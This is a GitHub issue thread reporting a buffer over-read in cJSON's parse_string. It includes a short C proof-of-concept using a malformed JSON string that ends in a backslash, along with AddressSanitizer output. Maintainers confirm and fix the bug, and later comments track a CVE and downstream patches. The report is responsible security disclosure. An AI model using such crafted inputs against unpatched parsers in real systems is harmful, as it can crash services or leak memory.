Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

cJSON buffer overflow with odd formatted JSON string #30

Closed
marcograss opened this issue Oct 1, 2016 · 3 comments
Closed

cJSON buffer overflow with odd formatted JSON string #30

marcograss opened this issue Oct 1, 2016 · 3 comments
Labels
bug security

Comments

@marcograss
Copy link

Hi,

I would like to report a buffer overflow in cJSON, you can test this PoC with a ODD string

#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include "cJSON.h"

static const char *my_json = "\"000000000000000000\\";

int main(int argc, const char * argv[]) {
    cJSON * root = cJSON_Parse(my_json);
    char * rendered = cJSON_Print(root);
    printf("%s\n", rendered);
    return 0;
}

building it with ASAN will trigger a out of bound on the input string, which it can be problematic since in lot of use cases the JSON input to applications using cJSON is untrusted.

Thanks

Marco

==72479==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0001000138d5 at pc 0x0001000062fb bp 0x7fff5fbff2a0 sp 0x7fff5fbff298
READ of size 1 at 0x0001000138d5 thread T0
#0 0x1000062fa in parse_string cJSON.c:198
#1 0x100001a01 in parse_value cJSON.c:366
#2 0x1000015bb in cJSON_ParseWithOpts cJSON.c:334
#3 0x100001dfa in cJSON_Parse cJSON.c:343
#4 0x10000e481 in main main.c:17
#5 0x7fff834bb5ac in start (libdyld.dylib+0x35ac)

0x0001000138d5 is located 0 bytes to the right of global variable '' defined in '/Users/marco/Downloads/cjsontest/cjsontest/main.c:14:30' (0x1000138c0) of size 21
'' is ascii string '"000000000000000000'
SUMMARY: AddressSanitizer: global-buffer-overflow cJSON.c:198 in parse_string
Shadow bytes around the buggy address:
0x1000200026c0: 02 f9 f9 f9 f9 f9 f9 f9 03 f9 f9 f9 f9 f9 f9 f9
0x1000200026d0: 05 f9 f9 f9 f9 f9 f9 f9 03 f9 f9 f9 f9 f9 f9 f9
0x1000200026e0: 03 f9 f9 f9 f9 f9 f9 f9 03 f9 f9 f9 f9 f9 f9 f9
0x1000200026f0: 00 f9 f9 f9 f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9
0x100020002700: 03 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
=>0x100020002710: 04 f9 f9 f9 f9 f9 f9 f9 00 00[05]f9 f9 f9 f9 f9
0x100020002720: 00 00 00 00 00 00 00 00 01 f9 f9 f9 f9 f9 f9 f9
0x100020002730: 06 f9 f9 f9 f9 f9 f9 f9 03 f9 f9 f9 f9 f9 f9 f9
0x100020002740: 05 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
0x100020002750: 07 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
0x100020002760: 05 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==72479==ABORTING
@FSMaxB FSMaxB added the bug label Oct 2, 2016
@FSMaxB
Copy link
Collaborator

FSMaxB commented Oct 2, 2016

I can confirm this. Looking into it right now.

FSMaxB added a commit that referenced this issue Oct 2, 2016
@FSMaxB
fix buffer overflow (#30)
94df772
@FSMaxB
Copy link
Collaborator

FSMaxB commented Oct 2, 2016

Fixed via 94df772

@FSMaxB FSMaxB closed this as completed Oct 2, 2016
@FSMaxB FSMaxB mentioned this issue Oct 2, 2016
Merged
@bmah888 bmah888 mentioned this issue Oct 5, 2016
Closed
bmah888 added a commit to esnet/iperf that referenced this issue Oct 5, 2016
@bmah888
Fix a buffer overflow in upstream cJSON.
d99a69f 
This is DaveGamble/cJSON#30, and fixes issue #466.
bmah888 added a commit to esnet/iperf that referenced this issue Oct 5, 2016
@bmah888
Fix a buffer overflow in upstream cJSON.
3ad5127 
This is DaveGamble/cJSON#30, and fixes issue #466.

Signed-off-by: Bruce A. Mah <bmah@es.net>
bmah888 added a commit to esnet/iperf that referenced this issue Oct 5, 2016
@bmah888
Fix a buffer overflow in upstream cJSON.
c35b632 
This is DaveGamble/cJSON#30, and fixes issue #466.

Signed-off-by: Bruce A. Mah <bmah@es.net>
@fgeek
Copy link

fgeek commented Nov 7, 2016

CVE request: http://www.openwall.com/lists/oss-security/2016/11/07/2

@FSMaxB FSMaxB added the security label Nov 7, 2016
FSMaxB added a commit that referenced this issue May 1, 2017
@FSMaxB
Squashed 'tests/json-patch-tests/' changes from 716417e..5405313
48b3909 
5405313 Add tests for replacing the root document (#30)

git-subtree-dir: tests/json-patch-tests
git-subtree-split: 54053131a31241ecccfffdc79753ff169aa9763c
Floessie added a commit to RawTherapee/RawTherapee that referenced this issue Mar 27, 2018
@Floessie
Bump cJSON to 1.7.5
237e5b4 
Should fix CVE-2016-4303 and DaveGamble/cJSON#30.
@firmianay firmianay mentioned this issue Jul 1, 2022
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug security
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@fgeek @marcograss @FSMaxB